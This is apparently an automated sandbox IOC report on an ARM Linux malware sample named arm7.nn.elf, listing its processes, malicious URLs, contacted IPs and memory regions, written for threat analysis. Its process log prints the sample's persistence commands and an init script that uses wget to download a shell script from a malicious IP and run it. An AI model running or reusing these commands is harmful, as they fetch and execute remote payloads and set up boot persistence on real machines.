Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n /tmp/arm7.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/arm7.nn.elf

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf

/tmp/arm7.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 36 hidden processes, click here to show them.

URLs

Name

Malicious

http://94.156.227.233/curl.sh

unknown

Details

Name:	http://94.156.227.233/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/arm7.nn.elf
Source:	arm7.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/lol.sh

unknown

Details

Name:	http://94.156.227.233/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/arm7.nn.elf
Source:	arm7.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

unknown

http://94.156.227.233/

unknown

Details

Name:	http://94.156.227.233/
TargetID:	-1
From Memory:	true
Source:	arm7.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, arm7.nn.elf.30.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

121.141.168.183

unknown

Korea Republic of

82.3.202.144

unknown

United Kingdom

40.113.41.15

unknown

United States

182.126.44.82

unknown

China

180.60.27.162

unknown

Japan

111.49.183.11

unknown

China

200.25.207.28

unknown

Ecuador

215.130.145.226

unknown

United States

136.3.123.32

unknown

United States

6.39.133.42

unknown

United States

13.12.87.173

unknown

United States

19.125.212.58

unknown

United States

36.162.157.86

unknown

China

202.2.238.44

unknown

Japan

96.9.228.48

unknown

United States

165.151.198.148

unknown

United States

97.163.82.153

unknown

United States

7.198.158.213

unknown

United States

109.41.234.71

unknown

Germany

82.197.76.26

unknown

United Kingdom

86.109.30.94

unknown

Austria

81.10.166.170

unknown

Austria

139.29.133.33

unknown

Germany

8.133.85.234

unknown

Singapore

182.249.221.111

unknown

Japan

193.235.60.192

unknown

Sweden

165.22.174.231

unknown

United States

109.227.87.94

unknown

Ukraine

213.189.243.25

unknown

Russian Federation

37.75.219.17

unknown

Ukraine

220.124.225.73

unknown

Korea Republic of

139.158.191.148

unknown

France

15.96.185.43

unknown

United States

23.217.44.145

unknown

United States

155.148.83.10

unknown

United States

169.211.240.78

unknown

Korea Republic of

119.187.21.177

unknown

China

7.149.65.46

unknown

United States

7.0.32.158

unknown

United States

186.207.72.146

unknown

Brazil

32.64.233.53

unknown

United States

66.134.48.119

unknown

United States

134.214.80.157

unknown

France

121.123.72.102

unknown

Malaysia

161.78.155.103

unknown

Switzerland

198.226.212.50

unknown

United States

61.120.10.238

unknown

Japan

121.183.37.18

unknown

Korea Republic of

173.118.64.2

unknown

United States

80.203.237.217

unknown

Norway

136.44.84.108

unknown

United States

213.192.12.21

unknown

Czech Republic

178.190.39.231

unknown

Austria

68.254.240.31

unknown

United States

134.87.211.117

unknown

Canada

185.152.44.253

unknown

Italy

58.81.160.169

unknown

Japan

211.158.211.11

unknown

China

120.78.147.78

unknown

China

102.33.218.39

unknown

South Africa

112.75.59.9

unknown

China

157.161.32.155

unknown

Switzerland

185.3.73.199

unknown

United Kingdom

167.236.235.19

unknown

United States

95.194.236.48

unknown

Sweden

114.45.104.94

unknown

Taiwan; Republic of China (ROC)

45.142.187.240

unknown

Italy

197.204.191.109

unknown

Algeria

107.195.207.131

unknown

United States

49.63.68.151

unknown

Korea Republic of

154.103.177.161

unknown

Sudan

77.111.130.211

unknown

Hungary

149.135.195.53

unknown

Australia

7.48.118.0

unknown

United States

58.205.83.243

unknown

China

32.137.59.183

unknown

United States

157.98.18.84

unknown

United States

53.113.174.253

unknown

Germany

178.255.179.69

unknown

Ukraine

7.187.160.166

unknown

United States

135.52.83.5

unknown

United States

30.64.28.196

unknown

United States

50.149.221.16

unknown

United States

7.255.140.23

unknown

United States

207.13.145.178

unknown

United States

131.150.136.61

unknown

United States

153.94.54.76

unknown

Germany

181.95.200.93

unknown

Argentina

50.164.244.124

unknown

United States

26.102.90.208

unknown

United States

157.4.229.151

unknown

Japan

110.70.116.79

unknown

Korea Republic of

113.30.84.209

unknown

Korea Republic of

220.221.72.239

unknown

Japan

123.91.25.47

unknown

China

96.213.122.35

unknown

United States

132.76.58.252

unknown

Israel

180.49.27.55

unknown

Japan

124.40.95.111

unknown

Japan

74.63.166.123

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7f7a10036000

page execute read

7f7b0ffff000

page read and write

7ffe7937d000

page execute read

56358bb3d000

page execute read

7f7b18342000

page read and write

56358ddac000

page read and write

56358f05f000

page read and write

7f7b10021000

page read and write

7f7b189c4000

page read and write

56358bd8e000

page read and write

7f7b18b30000

page read and write

7f7a10043000

page read and write

7f7b183d4000

page read and write

7f7a1003e000

page read and write

7f7b17b3a000

page read and write

7f7b19040000

page read and write

7f7b18ef3000

page read and write

7ffe792f8000

page read and write

7f7b19085000

page read and write

7f7b18736000

page read and write

56358dd95000

page execute and read and write

7f7b18d12000

page read and write

56358bd97000

page read and write

7f7b189a1000

page read and write

7f7b1901c000

page read and write

There are 15 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
arm7.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarm7.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
arm7.nn.elf